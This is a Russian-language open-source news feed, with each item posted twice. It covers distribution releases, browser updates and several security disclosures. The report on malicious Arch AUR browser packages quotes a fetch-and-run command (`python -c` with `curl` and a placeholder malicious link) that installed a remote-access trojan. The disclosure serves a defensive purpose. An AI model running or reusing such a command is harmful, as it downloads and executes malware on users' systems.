# Доступен дистрибутив Proxmox Backup Server 4.0
robot (spnet, 1) → All – 20:44:03 2025-08-06
Компания Proxmox, известная разработкой продуктов Proxmox Virtual Environment и Proxmox Mail Gateway, опубликовала выпуск дистрибутива Proxmox Backup Server 4.0, который преподносится как готовое решение для резервного копирования и восстановления виртуальных окружений, контейнеров и начинки серверов. Установочный ISO-образ доступен для свободной загрузки. Специфичные для дистрибутива компоненты открыты под лицензией AGPLv3. Для установки обновлений доступен как платный репозиторий Enterprise, так и два бесплатных репозитория, которые отличаются уровнем стабилизации обновлений.
https://www.opennet.ru/opennews/art.shtml?num=63693
robot (spnet, 1) → All – 20:44:03 2025-08-06
Компания Proxmox, известная разработкой продуктов Proxmox Virtual Environment и Proxmox Mail Gateway, опубликовала выпуск дистрибутива Proxmox Backup Server 4.0, который преподносится как готовое решение для резервного копирования и восстановления виртуальных окружений, контейнеров и начинки серверов. Установочный ISO-образ доступен для свободной загрузки. Специфичные для дистрибутива компоненты открыты под лицензией AGPLv3. Для установки обновлений доступен как платный репозиторий Enterprise, так и два бесплатных репозитория, которые отличаются уровнем стабилизации обновлений.
https://www.opennet.ru/opennews/art.shtml?num=63693
# AlmaLinux начал предоставлять пакеты с драйверами NVIDIA
robot (spnet, 1) → All – 19:44:03 2025-08-06
Разработчики дистрибутива AlmaLinux объявили о формировании пакетов с драйверами NVIDIA для веток AlmaLinux 9 и 10. Для установки также предложены пакеты с драйвером и стеком CUDA. Драйверы могут использоваться в конфигурациях с UEFI.
https://www.opennet.ru/opennews/art.shtml?num=63692
robot (spnet, 1) → All – 19:44:03 2025-08-06
Разработчики дистрибутива AlmaLinux объявили о формировании пакетов с драйверами NVIDIA для веток AlmaLinux 9 и 10. Для установки также предложены пакеты с драйвером и стеком CUDA. Драйверы могут использоваться в конфигурациях с UEFI.
https://www.opennet.ru/opennews/art.shtml?num=63692
# Рост популярности Linux в корпоративных сетях
robot (spnet, 1) → All – 18:44:02 2025-08-06
Компания Lansweeper сообщила о повышении популярности Linux в сетях корпоративных клиентов, использующих платформу инвентаризации Lansweeper. Сканирование примерно 18.5 миллионов устройств показало увеличение доли Linux на корпоративных ноутбуках и ПК с 1.6% в январе до 1.9% в июне. Если рассматривать только новые устройства, появившиеся после 1 марта, то доля систем с Linux достигла значения 2.5%. По мнению технического директора компании Lansweeper, наблюдаемое изменение не походит на единичный всплеск, а скорее отражает постоянный экспоненциальный рост.
https://www.opennet.ru/opennews/art.shtml?num=63691
robot (spnet, 1) → All – 18:44:02 2025-08-06
Компания Lansweeper сообщила о повышении популярности Linux в сетях корпоративных клиентов, использующих платформу инвентаризации Lansweeper. Сканирование примерно 18.5 миллионов устройств показало увеличение доли Linux на корпоративных ноутбуках и ПК с 1.6% в январе до 1.9% в июне. Если рассматривать только новые устройства, появившиеся после 1 марта, то доля систем с Linux достигла значения 2.5%. По мнению технического директора компании Lansweeper, наблюдаемое изменение не походит на единичный всплеск, а скорее отражает постоянный экспоненциальный рост.
https://www.opennet.ru/opennews/art.shtml?num=63691
# Proxmox Virtual Environment 9.0
robot (spnet, 1) → All – 11:44:04 2025-08-06
Опубликован релиз Proxmox Virtual Environment 9.0 - специализированного дистрибутива на базе Debian GNU/Linux для развёртывания и обслуживания виртуальных серверов на KVM и LXC, позиционируемого как альтернатива VMware vSphere, Microsoft Hyper‑V и Citrix Hypervisor. Управление - через web‑интерфейс, есть встроенное резервное копирование, кластеризация и live‑migration.
( [ читать дальше... ]( https://www.linux.org.ru/news/opensource/18043997#cut ) )
robot (spnet, 1) → All – 11:44:04 2025-08-06
Опубликован релиз Proxmox Virtual Environment 9.0 - специализированного дистрибутива на базе Debian GNU/Linux для развёртывания и обслуживания виртуальных серверов на KVM и LXC, позиционируемого как альтернатива VMware vSphere, Microsoft Hyper‑V и Citrix Hypervisor. Управление - через web‑интерфейс, есть встроенное резервное копирование, кластеризация и live‑migration.
( [ читать дальше... ]( https://www.linux.org.ru/news/opensource/18043997#cut ) )
# Выпуск web-браузера Chrome 139
robot (spnet, 1) → All – 10:44:02 2025-08-06
Компания Google опубликовала релиз web-браузера Chrome 139. Одновременно доступен стабильный выпуск свободного проекта Chromium, выступающего основой Chrome. Браузер Chrome отличается от Chromium использованием логотипов Google, наличием системы отправки уведомлений в случае краха, модулями для воспроизведения защищённого от копирования видеоконтента (DRM), системой автоматической установки обновлений, постоянным включением Sandbox-изоляции, поставкой ключей к Google API и передачей RLZ-параметров при поиске. Для тех, кому необходимо больше времени на обновление, отдельно поддерживается ветка Extended Stable, сопровождаемая 8 недель. Следующий выпуск Chrome 140 запланирован на 2 сентября.
https://www.opennet.ru/opennews/art.shtml?num=63690
robot (spnet, 1) → All – 10:44:02 2025-08-06
Компания Google опубликовала релиз web-браузера Chrome 139. Одновременно доступен стабильный выпуск свободного проекта Chromium, выступающего основой Chrome. Браузер Chrome отличается от Chromium использованием логотипов Google, наличием системы отправки уведомлений в случае краха, модулями для воспроизведения защищённого от копирования видеоконтента (DRM), системой автоматической установки обновлений, постоянным включением Sandbox-изоляции, поставкой ключей к Google API и передачей RLZ-параметров при поиске. Для тех, кому необходимо больше времени на обновление, отдельно поддерживается ветка Extended Stable, сопровождаемая 8 недель. Следующий выпуск Chrome 140 запланирован на 2 сентября.
https://www.opennet.ru/opennews/art.shtml?num=63690
# Flameshot 13.0
robot (spnet, 1) → All – 08:44:04 2025-08-06
Flameshot — мощный и в то же время простой инструмент для создания скриншотов на базе Qt — получил первое большое обновление за 3 года, в котором завершено портирование на Qt6 и добавлено много новых функций.
Программа предлагает интерактивный графический интерфейс с инструментами для аннотирования и разметки, а также множество опций. Одно из главных преимуществ Flameshot — работа в большинстве дистрибутивов Linux и в различных средах рабочего стола.
Особое внимание в новой версии уделяется мерам по обеспечению конфиденциальности. Загрузчик Imgur теперь отключен. Разработчики Flameshot называют несколько причин для этого, в том числе риск случайной загрузки пользователями конфиденциальных данных. Они считают, что для инструмента создания скриншотов «кажется слишком рискованным», если эта функция включена по умолчанию для всех.
( [ читать дальше... ]( https://www.linux.org.ru/news/opensource/18043660#cut0 ) )
Скачать Flameshot можно на страничке [ GitHub ]( https://github.com/flameshot-org/flameshot/releases ) в виде исходников или deb-пакета, а также на [ Flathub ]( https://flathub.org/apps/org.flameshot.Flameshot ) .
robot (spnet, 1) → All – 08:44:04 2025-08-06
Flameshot — мощный и в то же время простой инструмент для создания скриншотов на базе Qt — получил первое большое обновление за 3 года, в котором завершено портирование на Qt6 и добавлено много новых функций.
Программа предлагает интерактивный графический интерфейс с инструментами для аннотирования и разметки, а также множество опций. Одно из главных преимуществ Flameshot — работа в большинстве дистрибутивов Linux и в различных средах рабочего стола.
Особое внимание в новой версии уделяется мерам по обеспечению конфиденциальности. Загрузчик Imgur теперь отключен. Разработчики Flameshot называют несколько причин для этого, в том числе риск случайной загрузки пользователями конфиденциальных данных. Они считают, что для инструмента создания скриншотов «кажется слишком рискованным», если эта функция включена по умолчанию для всех.
( [ читать дальше... ]( https://www.linux.org.ru/news/opensource/18043660#cut0 ) )
Скачать Flameshot можно на страничке [ GitHub ]( https://github.com/flameshot-org/flameshot/releases ) в виде исходников или deb-пакета, а также на [ Flathub ]( https://flathub.org/apps/org.flameshot.Flameshot ) .
# Plague: бэкдор на основе PAM для Linux
robot (spnet, 1) → All – 07:44:04 2025-08-06
По информации команды Nextron Systems, в течение года вредоносный модуль под названием Plague оставался незаметным для средств защиты Linux-систем, несмотря на его активное распространение и глубокую интеграцию в критическую часть системы — стек аутентификации. Обнаружить его удалось лишь благодаря анализу артефактов, загруженных на VirusTotal в конце июля 2024 года. Ни один из них до сих пор не распознан антивирусами как угроза, что указывает на крайне высокий уровень маскировки и осторожности разработчиков.
( [ читать дальше... ]( https://www.linux.org.ru/news/security/18043536#cut ) )
robot (spnet, 1) → All – 07:44:04 2025-08-06
По информации команды Nextron Systems, в течение года вредоносный модуль под названием Plague оставался незаметным для средств защиты Linux-систем, несмотря на его активное распространение и глубокую интеграцию в критическую часть системы — стек аутентификации. Обнаружить его удалось лишь благодаря анализу артефактов, загруженных на VirusTotal в конце июля 2024 года. Ни один из них до сих пор не распознан антивирусами как угроза, что указывает на крайне высокий уровень маскировки и осторожности разработчиков.
( [ читать дальше... ]( https://www.linux.org.ru/news/security/18043536#cut ) )
# Директива ЕС может поставить вне закона разблокировку загрузчика Android-систем
robot (spnet, 1) → All – 07:44:04 2025-08-06
С 1 августа 2025 года становятся обязательными требования к кибербезопасности Европейского Союза, ранее изложенные в документе «Radio Equipment Directive (RED) 2014/53/EU».
( [ читать дальше... ]( https://www.linux.org.ru/news/android/18043346#cut0 ) )
Samsung уже отключили возможность разблокировки загрузчика в обновлении OneUI 8, следуя новым правилам.
[ Подробный разбор ]( https://www.riskinsight-wavestone.com/en/2025/07/radio-equipment-directive-a-first-step-toward-securing-european-connected-products/ )
robot (spnet, 1) → All – 07:44:04 2025-08-06
С 1 августа 2025 года становятся обязательными требования к кибербезопасности Европейского Союза, ранее изложенные в документе «Radio Equipment Directive (RED) 2014/53/EU».
( [ читать дальше... ]( https://www.linux.org.ru/news/android/18043346#cut0 ) )
Samsung уже отключили возможность разблокировки загрузчика в обновлении OneUI 8, следуя новым правилам.
[ Подробный разбор ]( https://www.riskinsight-wavestone.com/en/2025/07/radio-equipment-directive-a-first-step-toward-securing-european-connected-products/ )
# Выпуск Proxmox VE 9.0, дистрибутива для организации работы виртуальных серверов
robot (spnet, 1) → All – 20:44:03 2025-08-05
Опубликован релиз Proxmox Virtual Environment 9.0, специализированного Linux-дистрибутива на базе Debian GNU/Linux, нацеленного на развертывание и обслуживание виртуальных серверов с использованием LXC и KVM, и способного выступить в роли замены таких продуктов, как VMware vSphere, Microsoft Hyper-V и Citrix Hypervisor. Размер установочного iso-образа 1.6 ГБ.
https://www.opennet.ru/opennews/art.shtml?num=63688
robot (spnet, 1) → All – 20:44:03 2025-08-05
Опубликован релиз Proxmox Virtual Environment 9.0, специализированного Linux-дистрибутива на базе Debian GNU/Linux, нацеленного на развертывание и обслуживание виртуальных серверов с использованием LXC и KVM, и способного выступить в роли замены таких продуктов, как VMware vSphere, Microsoft Hyper-V и Citrix Hypervisor. Размер установочного iso-образа 1.6 ГБ.
https://www.opennet.ru/opennews/art.shtml?num=63688
# Обновление Firefox 141.0.2
robot (spnet, 1) → All – 18:44:03 2025-08-05
Доступен корректирующий выпуск Firefox 141.0.2, в котором устранено несколько проблем.
https://www.opennet.ru/opennews/art.shtml?num=63687
robot (spnet, 1) → All – 18:44:03 2025-08-05
Доступен корректирующий выпуск Firefox 141.0.2, в котором устранено несколько проблем.
https://www.opennet.ru/opennews/art.shtml?num=63687
# МойОфис выложил в публичный доступ AOT-компилятор TypeScript
robot (spnet, 1) → All – 17:44:05 2025-08-05
Компилятор tsnative – это кроссплатформенный компилятор языка TypeScript в нативный код с использованием LLVM.
Ключевые особенности:
• бесшовная интеграция с кодом на C++;
• системные абстракции: сборка мусора, очередь событий, различные API;
• реализация собственного подмножества ECMAScript;
• AOT-компиляция с применением LLVM.
Поддерживаемые платформы: Linux.
Поддерживается совместимость с:
>> Читать далее
robot (spnet, 1) → All – 17:44:05 2025-08-05
Компилятор tsnative – это кроссплатформенный компилятор языка TypeScript в нативный код с использованием LLVM.
Ключевые особенности:
• бесшовная интеграция с кодом на C++;
• системные абстракции: сборка мусора, очередь событий, различные API;
• реализация собственного подмножества ECMAScript;
• AOT-компиляция с применением LLVM.
Поддерживаемые платформы: Linux.
Поддерживается совместимость с:
>> Читать далее
# Выпуск P2P-системы синхронизации файлов syncspirit 0.4.1, совместимой с Syncthing
robot (spnet, 1) → All – 16:44:03 2025-08-05
Доступен релиз программы syncspirit 0.4.1, позволяющей организовать автоматическую непрерывную синхронизацию файлов пользователя на нескольких устройствах. Проект решает задачи сходные с проприетарной системой Resilio Sync (бывший BitTorrent Sync). Syncspirit написан на языке C++ и распространяется под лицензией GPLv3. Графический интерфейс построен с использованием библиотеки FLTK; для хранения БД используется отечественная встраиваемая СУБД libmdbx; для обработки событий применяется акторный фрейморк rotor. Готовые сборки доступны для Linux (x86_64, AppImage), Windows (поддерживается Windows XP) и macOS.
https://www.opennet.ru/opennews/art.shtml?num=63682
robot (spnet, 1) → All – 16:44:03 2025-08-05
Доступен релиз программы syncspirit 0.4.1, позволяющей организовать автоматическую непрерывную синхронизацию файлов пользователя на нескольких устройствах. Проект решает задачи сходные с проприетарной системой Resilio Sync (бывший BitTorrent Sync). Syncspirit написан на языке C++ и распространяется под лицензией GPLv3. Графический интерфейс построен с использованием библиотеки FLTK; для хранения БД используется отечественная встраиваемая СУБД libmdbx; для обработки событий применяется акторный фрейморк rotor. Готовые сборки доступны для Linux (x86_64, AppImage), Windows (поддерживается Windows XP) и macOS.
https://www.opennet.ru/opennews/art.shtml?num=63682
# Кандидат в релизы дистрибутива openSUSE Leap 16
robot (spnet, 1) → All – 16:44:03 2025-08-05
Представлен кандидат в релизы дистрибутива openSUSE Leap 16, построенного на технологиях следующей значительной ветки коммерческого дистрибутива SLES 16, переходящего на новую платформу SLFO (SUSE Linux Framework One), ранее известную под именем ALP (Adaptable Linux Platform). openSUSE Leap 16 сохранит черты классического дистрибутива, использующего традиционные пакеты, а для тех кому необходима атомарно обновляемая система с базовой начинкой в режиме только для чтения следует использовать редакцию openSUSE Leap Micro. Для тестирования доступны сборки для архитектур x86_64, ARM64, s390x и PowerPC. Релиз намечен на 1 октября 2025 года.
https://www.opennet.ru/opennews/art.shtml?num=63686
robot (spnet, 1) → All – 16:44:03 2025-08-05
Представлен кандидат в релизы дистрибутива openSUSE Leap 16, построенного на технологиях следующей значительной ветки коммерческого дистрибутива SLES 16, переходящего на новую платформу SLFO (SUSE Linux Framework One), ранее известную под именем ALP (Adaptable Linux Platform). openSUSE Leap 16 сохранит черты классического дистрибутива, использующего традиционные пакеты, а для тех кому необходима атомарно обновляемая система с базовой начинкой в режиме только для чтения следует использовать редакцию openSUSE Leap Micro. Для тестирования доступны сборки для архитектур x86_64, ARM64, s390x и PowerPC. Релиз намечен на 1 октября 2025 года.
https://www.opennet.ru/opennews/art.shtml?num=63686
# В Proton Authenticator выявлено оседание секретных ключей в отладочном логе
robot (spnet, 1) → All – 16:44:03 2025-08-05
В представленном на прошлой неделе приложении Proton Authenticator, применяемом для аутентификации при помощи одноразовых паролей, выявлена проблем с конфиденциальностью - в сборках для мобильной платформы iOS забыли отключить детализированный отладочный лог, в котором открытым текстом сохранялись исходные секретные ключи для генерации одноразовых паролей. Подобный лог сводил на нет шифрование ключей и ограничение к ним доступа по PIN-коду или биометрической аутентификации. Проблема устранена в обновлении 1.1.1. В сборках для Android в лог сохранялся только идентификатор ключа, а не сам ключ.
https://www.opennet.ru/opennews/art.shtml?num=63685
robot (spnet, 1) → All – 16:44:03 2025-08-05
В представленном на прошлой неделе приложении Proton Authenticator, применяемом для аутентификации при помощи одноразовых паролей, выявлена проблем с конфиденциальностью - в сборках для мобильной платформы iOS забыли отключить детализированный отладочный лог, в котором открытым текстом сохранялись исходные секретные ключи для генерации одноразовых паролей. Подобный лог сводил на нет шифрование ключей и ограничение к ним доступа по PIN-коду или биометрической аутентификации. Проблема устранена в обновлении 1.1.1. В сборках для Android в лог сохранялся только идентификатор ключа, а не сам ключ.
https://www.opennet.ru/opennews/art.shtml?num=63685
# Третий кандидат в релизы инсталлятора Debian 13
robot (spnet, 1) → All – 14:44:02 2025-08-05
Опубликован третий кандидат в релизы инсталлятора следующего значительного релиза Debian 13 "Trixie". Неделю назад ветка Debian 13 была переведена в состояние полной заморозки перед релизом, при которой остановлен перенос любых изменений пакетов в ветку Testing (исключение может быть сделано только после специального запроса и проведения ручного рецензирования командой, отвечающей за подготовку релиза). Релиз запланирован на 9 августа.
https://www.opennet.ru/opennews/art.shtml?num=63683
robot (spnet, 1) → All – 14:44:02 2025-08-05
Опубликован третий кандидат в релизы инсталлятора следующего значительного релиза Debian 13 "Trixie". Неделю назад ветка Debian 13 была переведена в состояние полной заморозки перед релизом, при которой остановлен перенос любых изменений пакетов в ветку Testing (исключение может быть сделано только после специального запроса и проведения ручного рецензирования командой, отвечающей за подготовку релиза). Релиз запланирован на 9 августа.
https://www.opennet.ru/opennews/art.shtml?num=63683
# Fosstodon - новый узел Mastodon, посвящённый СПО и технологиям
robot (spnet, 1) → All – 13:44:04 2025-08-05
Ресурс находится по адресу [ https://fosstodon.su ]( https://fosstodon.su ) .
Включен в список узлов [ https://the-federation.info/ ]( https://the-federation.info/ ) : под номером 64251: [ https://the-federation.info/node/details/64251 ]( https://the-federation.info/node/details/64251 )
Состояние сайта можно посмотреть здесь: [ https://checksite.ru/r/fosstodon.su ]( https://checksite.ru/r/fosstodon.su )
На субдомене [ https://wf.fosstodon.su ]( https://wf.fosstodon.su ) доступен WriteFreely для блоггинга.
Fosstodon.su — это сообщество Mastodon, доступное только по приглашению и открытое для всех, кто интересуется технологиями, в частности, свободным программным обеспечением с открытым исходным кодом.
Для создания аккаунта, надо написать администратору ( [ https://fosstodon.su/about/ ]( https://fosstodon.su/about/ ) ) чтобы получить пригласительную ссылку.
В письме необходимо рассказать о себе так, как вы бы хотели представить себя в собственном профиле на Fosstodon.su.
Согласитесь, администратор должен понимать, кого он приглашает в сообщество.
На Fosstodon.su не ругаются матом. На литературном русском гораздо легче оскорбить человека (но это тоже категорически запрещено).
>> Читать далее
robot (spnet, 1) → All – 13:44:04 2025-08-05
Ресурс находится по адресу [ https://fosstodon.su ]( https://fosstodon.su ) .
Включен в список узлов [ https://the-federation.info/ ]( https://the-federation.info/ ) : под номером 64251: [ https://the-federation.info/node/details/64251 ]( https://the-federation.info/node/details/64251 )
Состояние сайта можно посмотреть здесь: [ https://checksite.ru/r/fosstodon.su ]( https://checksite.ru/r/fosstodon.su )
На субдомене [ https://wf.fosstodon.su ]( https://wf.fosstodon.su ) доступен WriteFreely для блоггинга.
Fosstodon.su — это сообщество Mastodon, доступное только по приглашению и открытое для всех, кто интересуется технологиями, в частности, свободным программным обеспечением с открытым исходным кодом.
Для создания аккаунта, надо написать администратору ( [ https://fosstodon.su/about/ ]( https://fosstodon.su/about/ ) ) чтобы получить пригласительную ссылку.
В письме необходимо рассказать о себе так, как вы бы хотели представить себя в собственном профиле на Fosstodon.su.
Согласитесь, администратор должен понимать, кого он приглашает в сообщество.
На Fosstodon.su не ругаются матом. На литературном русском гораздо легче оскорбить человека (но это тоже категорически запрещено).
>> Читать далее
# Fosstodon - новый узел Mastodon, посвящённый СПО и технологиям
robot (spnet, 1) → All – 06:44:05 2025-08-05
Ресурс находится по адресу [ https://fosstodon.su ]( https://fosstodon.su ) .
Включен в список узлов [ https://the-federation.info/ ]( https://the-federation.info/ ) : под номером 64251: [ https://the-federation.info/node/details/64251 ]( https://the-federation.info/node/details/64251 )
Состояние сайта можно посмотреть здесь: [ https://checksite.ru/r/fosstodon.su ]( https://checksite.ru/r/fosstodon.su )
На субдомене [ https://wf.fosstodon.su ]( https://wf.fosstodon.su ) доступен WriteFreely для блоггинга.
Fosstodon.su — это сообщество Mastodon, доступное только по приглашению и открытое для всех, кто интересуется технологиями, в частности, свободным программным обеспечением с открытым исходным кодом.
Для создания аккаунта, надо написать администратору ( [ https://fosstodon.su/about/ ]( https://fosstodon.su/about/ ) ) чтобы получить пригласительную ссылку.
В письме необходимо рассказать о себе так, как вы бы хотели представить себя в собственном профиле на Fosstodon.su.
Согласитесь, администратор должен понимать, кого он приглашает в сообщество.
На Fosstodon.su не ругаются матом. На литературном русском гораздо легче оскорбить человека (но это тоже категорически запрещено).
>> Читать далее
robot (spnet, 1) → All – 06:44:05 2025-08-05
Ресурс находится по адресу [ https://fosstodon.su ]( https://fosstodon.su ) .
Включен в список узлов [ https://the-federation.info/ ]( https://the-federation.info/ ) : под номером 64251: [ https://the-federation.info/node/details/64251 ]( https://the-federation.info/node/details/64251 )
Состояние сайта можно посмотреть здесь: [ https://checksite.ru/r/fosstodon.su ]( https://checksite.ru/r/fosstodon.su )
На субдомене [ https://wf.fosstodon.su ]( https://wf.fosstodon.su ) доступен WriteFreely для блоггинга.
Fosstodon.su — это сообщество Mastodon, доступное только по приглашению и открытое для всех, кто интересуется технологиями, в частности, свободным программным обеспечением с открытым исходным кодом.
Для создания аккаунта, надо написать администратору ( [ https://fosstodon.su/about/ ]( https://fosstodon.su/about/ ) ) чтобы получить пригласительную ссылку.
В письме необходимо рассказать о себе так, как вы бы хотели представить себя в собственном профиле на Fosstodon.su.
Согласитесь, администратор должен понимать, кого он приглашает в сообщество.
На Fosstodon.su не ругаются матом. На литературном русском гораздо легче оскорбить человека (но это тоже категорически запрещено).
>> Читать далее
# Пакет StarDict в Debian отправляет выделенный текст на внешние серверы
robot (spnet, 1) → All – 19:44:03 2025-08-04
В предлагаемом в репозитории Debian Testing (будущий релиз Debian 13) пакете StarDict, реализующем интерфейс для поиска в словарях, выявлена проблема с конфиденциальностью - в конфигурации по умолчанию приложение отправляет автоматически помещаемый в буфер обмена выделенный текст (x11 PRIMARY selection) на внешние серверы. Достаточно в любом приложении выделить отрывок текста и он сразу отправляется без шифрования по протоколу HTTP на китайские серверы online-словарей dict.youdao.com и dict.cn. Проблема проявляется только при работе в окружениях на базе протокола X11, при использовании Wayland по умолчанию применяется изоляция буфера обмена.
https://www.opennet.ru/opennews/art.shtml?num=63677
robot (spnet, 1) → All – 19:44:03 2025-08-04
В предлагаемом в репозитории Debian Testing (будущий релиз Debian 13) пакете StarDict, реализующем интерфейс для поиска в словарях, выявлена проблема с конфиденциальностью - в конфигурации по умолчанию приложение отправляет автоматически помещаемый в буфер обмена выделенный текст (x11 PRIMARY selection) на внешние серверы. Достаточно в любом приложении выделить отрывок текста и он сразу отправляется без шифрования по протоколу HTTP на китайские серверы online-словарей dict.youdao.com и dict.cn. Проблема проявляется только при работе в окружениях на базе протокола X11, при использовании Wayland по умолчанию применяется изоляция буфера обмена.
https://www.opennet.ru/opennews/art.shtml?num=63677
# В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
robot (spnet, 1) → All – 13:44:05 2025-08-04
В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение [ к выявленным две недели ]( https://www.opennet.ru/opennews/art.shtml?num=63604 ) назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также [ содержащий изменение ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) , устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl
вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был [ удалён ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/ ) администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие [ аналогичный сценарий ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) установки вредоносного ПО на систему пользователя.
Следом было выявлено ещё три пакета с вредоносным кодом: [ ttf-mac-fonts-all ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/ ) , [ ttf-ms-fonts-all ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/ ) и gromit.
https://www.linux.org.ru/news/security/18040993
robot (spnet, 1) → All – 13:44:05 2025-08-04
В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение [ к выявленным две недели ]( https://www.opennet.ru/opennews/art.shtml?num=63604 ) назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также [ содержащий изменение ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) , устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl
вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был [ удалён ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/ ) администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие [ аналогичный сценарий ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) установки вредоносного ПО на систему пользователя.
Следом было выявлено ещё три пакета с вредоносным кодом: [ ttf-mac-fonts-all ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/ ) , [ ttf-ms-fonts-all ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/ ) и gromit.
https://www.linux.org.ru/news/security/18040993
# Shotcut 25.07.26
robot (spnet, 1) → All – 07:44:04 2025-08-04
Выпущен Shotcut 25.07.26 — новая стабильная версия бесплатного видеоредактора [ доступна ]( https://www.shotcut.org/download/ ) для Linux, macOS и Windows.
Основные нововведения:
•
Добавлен загрузчик моделей Speech to Text (включая Whisper.cpp (GGML)).
•
Новая тема интерфейса — System Fusion.
•
Фильтр Outline для работы с альфа-каналом (полезно для текста и прозрачных элементов).
>> Читать далее
robot (spnet, 1) → All – 07:44:04 2025-08-04
Выпущен Shotcut 25.07.26 — новая стабильная версия бесплатного видеоредактора [ доступна ]( https://www.shotcut.org/download/ ) для Linux, macOS и Windows.
Основные нововведения:
•
Добавлен загрузчик моделей Speech to Text (включая Whisper.cpp (GGML)).
•
Новая тема интерфейса — System Fusion.
•
Фильтр Outline для работы с альфа-каналом (полезно для текста и прозрачных элементов).
>> Читать далее
# Стабильный релиз прокси-сервера Squid 7
robot (spnet, 1) → All – 07:44:02 2025-08-04
Представлен стабильный релиз прокси-сервера Squid 7.1, готовый для использования в рабочих системах (выпуски 7.0.x имели статус бета-версий). После придания ветке 7.x статуса стабильной, в ней отныне будут производиться только исправления уязвимостей и проблем со стабильностью, также допускается внесение небольших оптимизаций. Разработка новых возможностей будет производиться в новой экспериментальной ветке 8.0. Пользователям прошлой стабильной ветки 6.x рекомендуется спланировать переход на ветку 7.x.
https://www.opennet.ru/opennews/art.shtml?num=63676
robot (spnet, 1) → All – 07:44:02 2025-08-04
Представлен стабильный релиз прокси-сервера Squid 7.1, готовый для использования в рабочих системах (выпуски 7.0.x имели статус бета-версий). После придания ветке 7.x статуса стабильной, в ней отныне будут производиться только исправления уязвимостей и проблем со стабильностью, также допускается внесение небольших оптимизаций. Разработка новых возможностей будет производиться в новой экспериментальной ветке 8.0. Пользователям прошлой стабильной ветки 6.x рекомендуется спланировать переход на ветку 7.x.
https://www.opennet.ru/opennews/art.shtml?num=63676
# В Clang намерены добавить режим усиленной безопасности
robot (spnet, 1) → All – 07:44:02 2025-08-04
Аарон Баллман (Aaron Ballman), главный сопровождающий компилятор Clang и участник команд разработки стандартов WG21 (C++) и WG14 (C), начал обсуждение добавления в компилятор Clang режима усиления безопасности. Новый режим позволит разом активировать набор опций для усиления защиты по аналогии с добавленным в GCC 14 флагом "-fhardened", при котором включаются опции "-D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -ftrivial-auto-var-init=zero -fPIE -pie -Wl,-z,relro,-z,now -fstack-protector-strong -fstack-clash-protection -fcf-protection=full".
https://www.opennet.ru/opennews/art.shtml?num=63675
robot (spnet, 1) → All – 07:44:02 2025-08-04
Аарон Баллман (Aaron Ballman), главный сопровождающий компилятор Clang и участник команд разработки стандартов WG21 (C++) и WG14 (C), начал обсуждение добавления в компилятор Clang режима усиления безопасности. Новый режим позволит разом активировать набор опций для усиления защиты по аналогии с добавленным в GCC 14 флагом "-fhardened", при котором включаются опции "-D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -ftrivial-auto-var-init=zero -fPIE -pie -Wl,-z,relro,-z,now -fstack-protector-strong -fstack-clash-protection -fcf-protection=full".
https://www.opennet.ru/opennews/art.shtml?num=63675
